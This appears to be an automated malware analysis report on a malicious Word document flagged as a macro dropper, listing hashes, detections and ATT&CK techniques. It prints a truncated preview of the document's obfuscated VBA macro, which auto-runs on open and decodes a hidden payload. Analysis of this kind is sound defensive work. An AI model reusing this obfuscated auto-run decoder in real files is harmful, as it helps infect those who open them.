Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42da997df77d59d9…

MALICIOUS

Office (OLE)

Size: 213.5 KB
Created: 2017-11-15 15:00:00
Authoring application: Microsoft Office Word
First seen: 2017-11-20
MD5: a3da35bec93d0d618091224064a3c4d3
SHA-1: c9607bad38933c97d43f268a3ef3fb6e0468e10a
SHA-256: 42da997df77d59d9375273e0cb8f5c4d4d39cc4845ec9f6cabc5180fcf3fdf72
Risk score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The critical ClamAV heuristic and the high-severity OLE_VBA_DOCOPEN heuristic indicate that this Office document contains malicious VBA macros. The Document_Open macro is designed to execute automatically when the document is opened, likely to download and execute a second-stage payload. No specific family could be identified due to the obfuscated nature of the script.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6375351-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6375351-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ - In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# - In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11550 bytes
SHA-256: 2b826918a3402120c66ad27a4df8ed1f1641c8b64b50eaa96b12eed7c50a51a2
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim lion As Long
Dim surgical As String
quine = nigeria
patriotically = "scipio"
pity
plenipotentiary = 33 + 4
 Pmt 0, plenipotentiary, 19513, 47567, 8
End Sub
Function briar(courtship) As String
Dim benolin As Long
Dim dimidiate As Long
basal = Math.Round(69)
Dim nothings As Long
Dim genetics(63) As Long
Dim rabbitweed(63) As Long
Dim diaphoretic(63) As Long
Dim calopogon(6962) As Byte
Dim bullpen() As Byte
Dim evolution As Long
rung = 4 - 35 + 65311
acanthocereus = 50 - 104 + 310
dialectic = 90 - 50 + 215
nonreversible = 49 - 13 + 4060
aflame = 62 - 51 + 262133
dishwashing = 106 - 44 + 16711618
breezily = 128 - 78 + 14
certain = 66 - 98 + 65568
Dim thrall() As Byte
thrall = VBA.StrConv(courtship, _
120 + 8)
aussilot = 50 + 54
 Pmt 0, aussilot, 25676, 12404, 3
assembled = 7840 + 3
leicestershire = vbKeyShift - 12
For electronics = (4 - 4) To assembled
If electronics Mod 2 = (5 - 5) Then
thrall(electronics) = thrall(electronics) - leicestershire
Else
thrall(electronics) = thrall(electronics) - (leicestershire - 1)
End If
Next electronics
caprifig = 29 + 34
 Pmt 0, caprifig, 24000, 44641, 4
visite = vitiated
For benolin = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
rabbitweed(benolin) = ibuprofen(benolin, breezily, 30 + 10)
genetics(benolin) = ibuprofen(benolin, nonreversible, 30 + 10)
diaphoretic(benolin) = ibuprofen(benolin, aflame, 20 + 20)
Next benolin
mantology = 7 + 10
 Pmt 0, mantology, 38312, 55005, 8
bullpen = thrall
birthwort = 25 + 51
 Pmt 0, birthwort, 18300, 28381, 2
malignant = 71 - 64 - 4
chanted = 49 - 22 - 25
For nothings = (4 - 4) To assembled
echinoderm = bullpen(nothings)
cleanshaven = bullpen(nothings + 2)
tripartite = genetics(visite(bullpen(nothings + 1)))
barrelfish = rabbitweed(visite(cleanshaven)) + visite(bullpen(nothings + malignant))
evolution = diaphoretic(visite(echinoderm)) + tripartite + barrelfish
benolin = ibuprofen(evolution, dishwashing, 32)
calopogon(dimidiate) = ibuprofen(benolin, certain, 22)
benolin = ibuprofen(evolution, rung, 32)
calopogon(dimidiate + 1) = ibuprofen(benolin, acanthocereus, 22)
calopogon(dimidiate + chanted) = ibuprofen(evolution, dialectic, 32)
dimidiate = dimidiate + chanted + 1
nothings = nothings + 3
Next
briar = calopogon
End Function

Sub pity()
general.thyroprotein.Value = Day(#12/5/2013#)
varday = sinanthropus = "acquitment"
Set cocheleate = general.thyroprotein.SelectedItem
heaving = 6 + 52
 Pmt 0, heaving, 5849, 19486, 7

bosniaherzegovina = cocheleate.Name
addax = 72 - 84 + 7856
compulsory = Right(bosniaherzegovina, addax)
cercaria = briar(compulsory)
nundinate = 12 + 37
 Pmt 0, nundinate, 15618, 38989, 6

#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim coastwise As String
Dim attributable As LongPtr
Dim stairway As LongPtr
Dim piles As Integer
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim multiplexer As Integer
Dim stairway As Long
Dim unvaried As Variant
Dim attributable As Long
#End If
xraying = 33 + 32
 Pmt 0, xraying, 26795, 47436, 5
crossfire = 40 + 1
 Pmt 0, crossfire, 8972, 37174, 7
ble = cercaria
attributable = armband(ble)
coagulable = "alma"
inequitably = "catahedra"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim butterscotch As String
Dim crowberry As LongPtr
Dim nonreciprocating As LongPtr
Dim phalaropus As LongPtr
beard = 1 - 11 + 2074
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim crowberry As Long
pollster = 101 - 53 + 733
Dim nonreciprocating As Long
Dim phalaropus As Long
beard = pollster + 3459
#End If
Dim preface As Long
Dim asphaltum As String
crowberry = 46 - 60 + 14
stairway = attributabl
... (truncated)